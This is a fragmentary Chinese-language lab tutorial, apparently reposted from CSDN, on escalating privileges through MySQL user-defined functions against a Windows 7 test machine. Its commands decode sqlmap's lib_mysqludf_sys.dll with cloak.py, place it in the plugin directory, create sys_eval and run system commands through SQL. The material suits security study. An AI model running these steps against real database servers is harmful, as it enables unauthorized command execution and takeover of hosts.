目录
5.dl_文件为了防止误杀,dll_文件会经过异或编码,不能直接用,如果想用的话需要对其进行解码
7.上传dll文件至指定文件夹(mysql安装目录下的lib/plugin/)
攻击机 win10
靶机 win7(192.168.20.130)
udf = “user defined function”,即‘用户自定义函数’。是通过添加新函数,对MYSQL的功能进行扩充,性质就像使用本地MYSQL函数如abs()或concat()。udf在mysql5.1以后的版本中,存在于’mysql/lib/plugin’目录下,文件后缀为’.dll’
mysql5.0以上的需要在mysql安装目录的lib目录下新建一个plugin文件夹,5.0以下的,上传目录为D:/windows
show variables like '%compile%';
执行python cloak.py -d -i
D:python3.10.0sqlmapdataudfmysqlwindows64lib_mysqludf_sys.dll_
create function sys_eval returns string soname 'lib_mysqludf_sys.dll';
select sys_eval('whoami');
本文为互联网自动采集或经作者授权后发布,本文观点不代表立场,若侵权下架请联系我们删帖处理!文章出自:https://blog.csdn.net/m0_63127854/article/details/125250553